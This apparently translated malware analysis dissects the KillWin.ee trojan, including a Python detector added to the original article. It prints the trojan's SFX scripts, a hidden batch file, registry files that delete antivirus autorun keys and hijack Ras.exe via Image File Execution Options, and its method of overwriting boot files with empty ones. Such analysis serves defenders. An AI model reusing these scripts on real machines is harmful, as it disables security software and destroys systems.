Analyzing and removing the Trojan.Win32.KillWin.ee virus

Source: Internet
Author: User

Viruses today change constantly; new disguises and new variants appear one after another. Faced with this, many users can only restore or reinstall the system again and again. Security software seems powerless at this point, because many viruses and Trojans start by disabling the security protection before they attack. This is nothing new, and the Trojan.Win32.KillWin.ee described here has the same capability.

Virus analysis
The virus is named Trojan.Win32.KillWin.ee. Although the file is only 169 KB (173,614 bytes), its destructive power should not be underestimated. The virus is a WinRAR self-extracting (SFX) archive whose icon has been changed to that of the Kaka Assistant (Rising's security tool) so that it passes for a legitimate program.

The program uses the SFX script to extract itself and then begins damaging the system. The SFX script is:
Path=%SystemRoot%\system32
SavePath
Setup=hidecmd.exe kv.bat
Silent=1
Overwrite=1

The SFX runs hidecmd.exe (a tool that runs a BAT file in a hidden window), which in turn calls kv.bat so that its execution stays invisible.
The content of kv.bat is:
@echo off
%SystemRoot%\regedit /s kaka.reg
%SystemRoot%\regedit /s gameover.reg
exit
The virus modifies the registry
Once the commands above have run, the virus silently imports the two REG files it dropped in order to modify the registry. Their contents are as follows:
kaka.reg:
Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]
"Installed"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]
"Installed"="1"


The virus removes the Kaka Assistant
The virus does not stop there. It then sets out to find and disable the Kaka Assistant's startup. The content is as follows:
gameover.reg:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]
"Debugger"="C:\\winnt\\system32\\gameover.exe"
In this way, Kaka's main program (Ras.exe) is hijacked through the Image File Execution Options "Debugger" value and redirected to the dropped virus file.
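As an added example (not code from the original article), the following Python parses the Registry Editor 5.00 format shown above and flags the two indicators a responder would look for in a dropped .reg file: a "Debugger" value under Image File Execution Options, and wholesale deletion of the Run/RunOnce keys. The sample .reg text is constructed here from the kaka.reg and gameover.reg listings.

```python
import re

# Key-path fragments to match (registry paths are case-insensitive).
IFEO = "\\image file execution options\\"
AUTORUN = ("\\currentversion\\run", "\\currentversion\\runonce")

# Constructed sample, reconstructed from the article's kaka.reg / gameover.reg.
SAMPLE = r'''Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]
"Debugger"="C:\\winnt\\system32\\gameover.exe"
'''

def parse_reg(text):
    """Return [(key, deleted, {name: data})] in file order.
    A leading '-' on a key line means regedit deletes the whole key."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            entries.append((key.lstrip("-"), key.startswith("-"), {}))
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and entries:
            name, data = m.group(1), m.group(2)
            if data.startswith('"') and data.endswith('"'):
                # REG_SZ: drop the quotes and undo the \\ and \" escaping
                data = re.sub(r"\\(.)", r"\1", data[1:-1])
            entries[-1][2][name] = data
    return entries

def find_suspicious(text):
    """Flag IFEO Debugger hijacks and deletion of the Run/RunOnce keys."""
    findings = []
    for key, deleted, values in parse_reg(text):
        low = key.lower()
        if IFEO in low and "Debugger" in values:
            target = key.rsplit("\\", 1)[-1]          # hijacked image name
            findings.append(("ifeo_hijack", target, values["Debugger"]))
        if deleted and low.rstrip("\\").endswith(AUTORUN):
            findings.append(("autorun_key_deleted", key, None))
    return findings
```

Running find_suspicious(SAMPLE) reports the two deleted autorun keys followed by the Ras.exe hijack pointing at C:\winnt\system32\gameover.exe.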

TIPS: The hard-coded path C:\winnt\system32 shows that the author is targeting the Windows 2000 family. The WinRAR SFX script above uses the %SystemRoot% environment variable, but this Debugger value does not: the WINNT folder exists only on the Windows 2000/NT platform, whereas XP uses WINDOWS\system32. On XP, therefore, this hijack point is invalid.

Important notes
%System32% is a variable path: the virus queries the operating system for the location of the current system folder. On Windows 2000/NT the default installation path is C:\Winnt\System32; on Windows 95/98/Me it is C:\Windows\System; on Windows XP it is C:\Windows\System32.
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp, the current user's TEMP cache directory
%Windir% the Windows directory
%DriveLetter% the root directory of a logical drive
%ProgramFiles% the default program installation directory
%HomeDrive% = C:, the partition the system currently booted from
%Documents and Settings% the root directory of the current user's documents

gameover.exe damages the system
After the steps above, the virus moves on to damaging the system itself by dropping the gameover.exe program. gameover.exe is in fact another self-extracting archive, whose SFX script is as follows:
Path=C:\
SavePath
Silent=1
Overwrite=1
It extracts 0-byte empty files with the same names, overwriting the following system files and breaking system startup:
AUTOEXEC.BAT
Boot.ini
Bootfont.bin
CONFIG.SYS
IO.SYS
MSDOS.SYS
NTDETECT.COM
Ntldr
